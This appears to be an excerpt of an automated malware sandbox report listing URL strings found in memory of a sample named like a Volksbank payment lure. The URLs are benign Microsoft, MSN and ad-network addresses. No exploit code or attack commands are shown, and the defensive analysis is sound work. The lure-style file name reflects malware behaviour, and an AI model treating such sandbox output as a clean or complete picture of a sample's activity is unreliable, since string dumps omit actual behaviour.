            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC9fc5c8b8bfb94ba5833ba8065b1de35
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7ca
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/AAehR3S.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://btloader.com/tag?o=6208086025961472&upapi=true
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://capturemedia-assets.com/
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=14512.30550
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-aad.png?b=14512.30550
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://certs.godaddy.com/repository/0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://clientconfig.microsoftonline-p.net
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/avatar.png
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/bundle.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/fabric.min.css
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://contextual.media.net/
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://contextual.media.net/48/nrrV39259.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://csp.withgoogle.com/csp/active-view-scs-read-write-acl
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://csp.withgoogle.com/csp/ads-programmable
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://csp.withgoogle.com/csp/recaptcha/1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/ads-programmable
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/adspam-signals-scs
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/recaptcha
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/storyset?platform=desktop&release=20h2&schema=3.0&sku=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/tip-contentset?platform=desktop&release=20h2&schema=3.
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/5c08e5e7-4cfd-4901-acbc-79925276672c/33c540c16
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/fb5aa6fc-fb0f-43c0-9aba-9bf4642cdd05/9a3b4a8d1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://dl.google.com/update2/installers/icons/%7B8a69d345-d564-463c-aff1-a69d9e530f96%7D.bmp?lang=e
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?8f6ec558c7d1c621e0d5881446d586b0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?bbc9af5ecc12954d59c63a1771114562
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://eb2.3lift.com/sync?
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8d&Fr
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BY3&Front
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://evoke-windowsservices-tas.msedge.net/ab
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?be80708f3c28e284ad0514b0fdf6c149
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?befe19777c943dc577746ab897037d94
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008749648.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007602786.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007682293.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008046399.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008749648.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007602786.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3004460975.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3004602535.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007682293.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012825130.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3004886760.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3010910153.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3009400912.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005040263.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008966880.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3009603810.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3004964736.00000000023AD000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008046399.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://ib.3lift.com/sync.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://ib.adnxs.com/
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://ib.adnxs.com/async_usersync_file
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRT?ver=5f90
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRY?ver=52e8
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OALs
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OAdg?ver=1c49
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrw?ver=d941
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrz?ver=8427
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OI51?ver=0686
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ONWz
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWB7v5
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIa
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIj
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLuYO
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKp8YX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAMqFmF?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODMk8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODQmd?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODept?h=75&w=100&m=6&q=60&u=t&o=t&l=f
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEFck?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=82
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEQ0I?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4WR?h=75&w=100&m=6&q=60&u=t&o=t&l=f
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4Xx?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFBrV?h=75&w=100&m=6&q=60&u=t&o=t&l=f
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFC5q?h=75&w=100&m=6&q=60&u=t&o=t&l=f
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFE0J?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=70
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFENj?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFJFJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFLk7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=43
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFWV8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFhty?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFsUC?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFu51?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFy7B?h=75&w=100&m=6&q=60&u=t&o=t&l=f
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFyKG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=60
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG3Y7?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG88s?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGPXq?h=194&w=300&m=6&q=60&u=t&o=t&l=f
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGQtJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGV90?h=194&w=300&m=6&q=60&u=t&o=t&l=f&x=5
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGapF?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGlbE?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGmTG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGyYN?h=194&w=300&m=6&q=60&u=t&o=t&l=f
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH2Ml?h=194&w=300&m=6&q=60&u=t&o=t&l=f
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH6xB?h=75&w=100&m=6&q=60&u=t&o=t&l=f
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB14hq0P?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aXBV1?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cEP3G?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cG73h?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1ftEY0?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1gEFcn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7gRE?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hg4?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3014339280.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012915497.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012866639.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013438591.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013029030.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013164901.000000000239E000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013126977.000000000239C000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://login.live.com/
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3014339280.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012915497.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012866639.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013029030.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013164901.000000000239E000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013126977.000000000239C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013438591.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/TI
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3003974432.00000000023AD000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3004964736.00000000023AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?route=C512_BAY&stsid=S.BC4837E917425070&uaid=d9
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DhB9Gg0Em7s2jvLPGG9crywwB
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604&scid=1&mkt=en-US&Platform=Windows10&clienti
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?route=C512_BAY&uaid=b6de8762e4ae48b19a7d0d74ba392110
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://login.live.com/ppsecure/post.srf?mkt=en-US&platform=Windows10&id=80604&clientid=000000004807
